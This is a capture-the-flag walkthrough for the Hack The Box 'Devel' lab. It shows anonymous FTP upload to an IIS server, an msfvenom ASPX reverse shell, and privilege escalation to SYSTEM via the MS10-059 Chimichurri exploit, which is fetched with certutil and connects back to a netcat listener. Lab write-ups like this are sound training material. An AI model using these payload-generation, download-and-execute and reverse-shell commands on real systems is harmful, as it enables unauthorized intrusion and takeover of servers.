# Devel ## \*\*Nmap \*\* ``` nmap 10.10.10.5 -p- -A -T4 PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` As we can see we have port 21 and port 80 open. I will start by hitting port 80 with `gobuster` and `nikto` to save some time and will then jump into port 21. ## FTP From the `nmap` results earlier we can see FTP is running on port 21 and anonymous login is allowed. (nmap will check this by default). We successfully login as per below: ![ftp on port 21](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2ff67bd26e0e7b7f72dd1512238217d84e87e970%2Fimage.png?alt=media) We are able to login with a blank password using the anonymous login. We can see the aspnet\_client directory where if we follow leads us to a directory with the .NET framework version it is running under. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3330a3c6b6498c3a35c101249a0775f108fd5bac%2Fimage.png?alt=media) We can take a note of the version running on the machine in the event we need it. From the login directory of the FTP we can see the welcome page "welcome.png" for IIS. When viewing this we can see the server is running IIS7. ![IIS7 welcome.png](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5fb24bbfdee811506e50ef118c32d9ef7eda0273%2Fimage.png?alt=media) ## File Upload As it is possible the FTP has been misconfigured we should check to see if we can perform a file upload. If we are able to perform this it is probable we could access uploaded files in the web browser and get a reverse shell on the server. ![testing ftp file upload](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-68d2b7f3216ecf8979abcb6379d524779f18bfb1%2Fimage.png?alt=media) We can see when we now browse to the file in a web browser we can see our text file confirming file upload. ## Payload Creation ![file upload on ftp](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-644052759caa0dbe8106f63643b9e01903419509%2Fimage.png?alt=media) At this point we should see if we can get a reverse shell uploaded and hopefully we can execute it as well. As this is an IIS server we would ideally need to use a ASP or ASPX reverse shell. We can create these with `msfvenom`. We need to use the following payload: ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f aspx -o /home/kali/Desktop/upload.aspx ``` {% hint style="info" %} netcat does not handle staged payloads well so the payload above is unstaged. {% endhint %} I used port 443 for my port in the payload as this is a reliable connection that is usually open on web servers. We can upload the payload to the server using the `put` command. ![uploading our payload to the ftp](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-18a2a6292823ae3b4f8d4e7ecdac833655249193%2Fimage.png?alt=media) ## Reverse Shell Before attempting to execute the payload we need to set up a `netcat` listener to catch the reverse shell. if we are using a port within the 1-1024 range we will need to use `sudo` ![setting up a nc listener on port 443](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d7896e41cc938747f12f2685610f360ca02ddd97%2Fimage.png?alt=media) We can now browse to the directory of the file we uploaded. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3c4420d580154e5cb3d016040af7183166cf4dc6%2Fimage.png?alt=media) ![Low privilege shell](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-760cad7e9e538e3bc283718e7986bd3d956f3a36%2Fimage.png?alt=media) After checking back on `netcat` we have a shell as a low privilege account on the server. ## Privilege Escalation We should now run the `systeminfo` command to see what initial information we can gather regarding the system. Taking note the important fields such as OS Name and System Type. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b898293db146e69cfa39779085d6352900434ea%2Fimage.png?alt=media) We can take the `systeminfo` information and run this against Windows exploit suggester. ![Window exploit suggester.](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cce2ff687b31bf8da651eda7fc80da8e58a98638%2Fimage.png?alt=media) The exploit we are interested in above is MS10-059. This is a kernel level exploit which affects the following: | | | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **Vulnerability Identifier**: CVE-2010-2554; CVE-2010-2555 | | **Risk**: Important | | **Affected Software**: | |
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 for 32-bit Systems
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Vista Service Pack 1
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1
  • Windows Vista x64 Edition Service Pack 2
| |

Description:

This security update addresses vulnerabilities in the the Tracing Feature for Services that could allow increase in privilege once an attacker runs a specially crafted application.

| In this scenario we are going to use the Chimichurri compiled exploit taken from the following GitHub link: Once downloaded we can `cd` to the directory where we have the Chimichurri.exe on our attacking machine and start a `Python SimpleHTTPServer` with the following command: ``` python -m SimpleHTTPServer ``` {% hint style="info" %} If no port is specified Python will default to port 8000 {% endhint %} We can then use `certutil.exe` on the Windows machine to download the executable from our attacking machine. ``` certutil.exe -urlcache -split -f "http://:/chimichurri.exe" ``` ![Downloading with certutil.exe](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ee5e0d7085473a0a78bf35c72a64e8f8e6a112aa%2Fimage.png?alt=media) When attempting to run the executable we are given a usage example: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a31fcb1b610eca71dea99f383378fd5139019f6b%2Fimage.png?alt=media) First we can set up a `netcat` listener on our attacking machine to catch the shell. ``` nc -lvp 4455 ``` We can these use the following command to run Chimichurri.exe ``` Chimichurri.exe 10.10.14.31 4455 ``` After waiting a short while we should gain a shell as NT Authority\system ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ba310b75053f4f83746cfddf9f46db9a91d2da27%2Fimage.png?alt=media)